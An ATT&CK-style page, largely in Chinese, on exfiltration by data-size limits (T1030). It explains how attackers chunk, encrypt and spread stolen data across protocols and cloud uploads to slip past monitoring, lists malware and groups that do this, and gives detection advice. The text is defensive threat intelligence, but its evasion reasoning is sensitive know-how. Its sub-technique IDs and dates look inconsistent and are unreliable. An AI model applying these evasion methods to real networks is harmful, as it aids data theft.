1. Home
  2. Techniques
  3. Enterprise
  4. 数据传输大小限制

数据传输大小限制

ID Name
T1030.001 分块加密传输
T1030.002 协议内分片传输
T1030.003 云存储分段上传

数据传输大小限制指攻击者通过控制单次传输数据量来规避检测的技术手段,通常将窃取数据分割为符合网络监控阈值的碎片化单元进行传输。传统检测方法通过分析异常数据流特征(如客户端持续发送固定大小数据包)、检查协议合规性(如非标准分片行为)以及识别非常规网络连接进行防御。防御方需结合流量基线分析、协议深度解析和端点行为监控构建多维检测体系。

为应对传统检测机制,攻击者发展出融合协议特性滥用、云服务劫持和加密分块的新型匿迹技术,通过将数据泄露行为解构为符合业务常态的微观操作,实现"合法形式承载非法目的"的隐蔽传输。

当前数据传输限制匿迹技术的核心演进方向体现在传输载体的环境适配与行为特征的合法化重构:分块加密传输通过密码学手段破坏数据块间的语义关联,将窃密流量伪装为持续的业务交互;协议内分片传输深度绑定标准协议栈实现机制,使恶意分片获得协议规范层面的合法性背书;云存储分段上传则利用云平台基础设施的信任优势,将数据外泄过程转化为合规的API调用序列。三类技术的共性在于突破传统网络层对抗模式,通过传输行为的微观化、协议化和服务化改造,使得单次传输事件具备业务合理性,整体泄露过程呈现低速率、长周期、分布式特征,传统基于单点检测或短期流量分析的防御体系难以有效感知。

匿迹技术的发展迫使防御方构建跨协议解析、云环境监测和用户行为分析的综合防御体系,需结合加密流量元数据分析、云API调用链追踪以及长期数据流关联技术,实现对隐蔽传输行为的全景感知与精确阻断。

ID: T1030
Sub-techniques:  T1030.001, T1030.002, T1030.003
Tactic: 数据渗出
Platforms: Linux, Windows, macOS
Version: 1.0
Created: 31 May 2017
Last Modified: 14 July 2020

匿迹效应

效应类型 是否存在
特征伪装
行为透明
数据遮蔽
时空释痕

特征伪装

攻击者通过协议规范深度适配,将分片传输行为伪装成标准协议操作(如HTTP断点续传、TCP分段重传),利用协议容错机制掩盖数据重组逻辑。同时借助云服务官方接口实现传输载体合法化,使得分片特征与正常业务流量高度相似,规避基于协议异常特征的检测。

数据遮蔽

采用端到端加密技术对每个数据分片进行独立加密处理,结合HTTPS、SFTP等加密通道传输,隐藏分片内容语义和关联性。云存储分段上传进一步利用云服务商提供的传输层加密,形成双重加密保护机制,有效对抗内容深度检测。

时空释痕

通过将完整数据分割为长期传输的微分量,并动态调整传输间隔(如结合目标系统工作时间设定传输周期),使得泄露行为特征被稀释在正常业务流量时间线中。云存储场景下的多区域分布式存储策略,进一步在空间维度分散数据痕迹,增加防御方全局取证难度。

Procedure Examples

ID Name Description
S0622 AppleSeed

AppleSeed has divided files if the size is 0x1000000 bytes or more.[1]
G0007 APT28

APT28 has split archived exfiltration files into chunks smaller than 1MB.[2]
G0096 APT41

APT41 transfers post-exploitation files dividing the payload into fixed-size chunks to evade detection.[3]
C0015 C0015

During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration.[4]

C0026 C0026

During C0026, the threat actors split encrypted archives containing stolen files and information into 3MB parts prior to exfiltration.[5]
S0030 Carbanak

Carbanak exfiltrates data in compressed chunks if a message is larger than 4096 bytes .[6]
S0154 Cobalt Strike

Cobalt Strike will break large data sets into smaller chunks for exfiltration.[7]
S0170 Helminth

Helminth splits data into chunks up to 23 bytes and sends the data in DNS queries to its C2 server.[8]
S0487 Kessel

Kessel can split the data to be exilftrated into chunks that will fit in subdomains of DNS queries.[9]
S1020 Kevin

Kevin can exfiltrate data to the C2 server in 27-character chunks.[10]
G1014 LuminousMoth

LuminousMoth has split archived files into multiple parts to bypass a 5MB limit.[11]
S1141 LunarWeb

LunarWeb can split exfiltrated data that exceeds 1.33 MB in size into multiple random sized parts between 384 and 512 KB.[12]
S0699 Mythic

Mythic supports custom chunk sizes used to upload/download files.[13]

S0644 ObliqueRAT

ObliqueRAT can break large files of interest into smaller chunks to prepare them for exfiltration.[14]
S0264 OopsIE

OopsIE exfiltrates command output and collected files to its C2 server in 1500-byte blocks.[15]
G1040 Play

Play has split victims' files into chunks for exfiltration.[16][17]
S0150 POSHSPY

POSHSPY uploads data in 2048-byte chunks.[18]
S1040 Rclone

The Rclone "chunker" overlay supports splitting large files in smaller chunks during upload to circumvent size limits.[19][4]
S0495 RDAT

RDAT can upload a file via HTTP POST response to the C2 split into 102,400-byte portions. RDAT can also download data from the C2 which is split into 81,920-byte portions.[20]

G0027 Threat Group-3390

Threat Group-3390 actors have split RAR files for exfiltration into parts.[21]

Mitigations

ID Mitigation Description
M1031 Network Intrusion Prevention

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level.

Detection

ID Data Source Data Component Detects
DS0029 Network Traffic Network Connection Creation

Monitor for newly constructed network connections that are sent or received by untrusted hosts or uncommon data flows (e.g. unusual network communications or suspicious communications sending fixed size data packets at regular intervals as well as unusually long connection patterns). Consider analyzing packet contents to detect application layer protocols, leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, protocol port mismatch, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g. monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated
Network Traffic Flow

Monitor and analyze traffic flows that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, or gratuitous or anomalous traffic patterns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

References

  1. KISA. (2021). Phishing Target Reconnaissance and Attack Resource Analysis Operation Muzabi. Retrieved March 8, 2024.
  2. NSA, CISA, FBI, NCSC. (2021, July). Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments. Retrieved July 26, 2021.
  3. Nikita Rostovcev. (2022, August 18). APT41 World Tour 2021 on a tight schedule. Retrieved February 22, 2024.
  4. DFIR Report. (2021, November 29). CONTInuing the Bazar Ransomware Story. Retrieved September 29, 2022.
  5. Hawley, S. et al. (2023, February 2). Turla: A Galaxy of Opportunity. Retrieved May 15, 2023.
  6. Bennett, J., Vengerik, B. (2017, June 12). Behind the CARBANAK Backdoor. Retrieved June 11, 2018.
  7. Strategic Cyber LLC. (2017, March 14). Cobalt Strike Manual. Retrieved May 24, 2017.
  8. Falcone, R. and Lee, B.. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.
  9. Dumont, R., M.Léveillé, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020.
  10. Kayal, A. et al. (2021, October). LYCEUM REBORN: COUNTERINTELLIGENCE IN THE MIDDLE EAST. Retrieved June 14, 2022.
  11. Botezatu, B and etl. (2021, July 21). LuminousMoth - PlugX, File Exfiltration and Persistence Revisited. Retrieved October 20, 2022.
  1. Jurčacko, F. (2024, May 15). To the Moon and back(doors): Lunar landing in diplomatic missions. Retrieved June 26, 2024.
  2. Thomas, C. (n.d.). Mythc Documentation. Retrieved March 25, 2022.
  3. Malhotra, A. (2021, March 2). ObliqueRAT returns with new campaign using hijacked websites. Retrieved September 2, 2021.
  4. Lee, B., Falcone, R. (2018, February 23). OopsIE! OilRig Uses ThreeDollars to Deliver New Trojan. Retrieved July 16, 2018.
  5. CISA. (2023, December 18). #StopRansomware: Play Ransomware AA23-352A. Retrieved September 24, 2024.
  6. Trend Micro Research. (2023, July 21). Ransomware Spotlight: Play. Retrieved September 24, 2024.
  7. Dunwoody, M.. (2017, April 3). Dissecting One of APT29’s Fileless WMI and PowerShell Backdoors (POSHSPY). Retrieved April 5, 2017.
  8. Nick Craig-Wood. (n.d.). Rclone syncs your files to cloud storage. Retrieved August 30, 2022.
  9. Falcone, R. (2020, July 22). OilRig Targets Middle Eastern Telecommunications Organization and Adds Novel C2 Channel with Steganography to Its Inventory. Retrieved July 28, 2020.
  10. Dell SecureWorks Counter Threat Unit Threat Intelligence. (2015, August 5). Threat Group-3390 Targets Organizations for Cyberespionage. Retrieved August 18, 2018.